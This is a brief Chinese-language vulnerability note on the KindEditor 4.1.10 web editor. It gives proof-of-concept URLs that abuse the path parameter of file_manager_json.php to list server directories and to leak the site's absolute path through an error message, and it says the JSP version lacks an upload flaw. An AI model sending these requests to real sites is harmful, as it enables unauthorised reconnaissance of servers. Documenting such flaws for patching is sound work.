Kindeditor编辑器漏洞-飞外

测试环境：KindEditor 4.1.10

PoC：http://localhost/kindeditor/php/file_manager_json.php?path=/var/www/html/

报错信息泄露网站绝对路径：http://localhost/kindeditor/php/file_manager_json.php?path=/

二、KindEditor v4.1.10 JSP版没有文件上传漏洞

......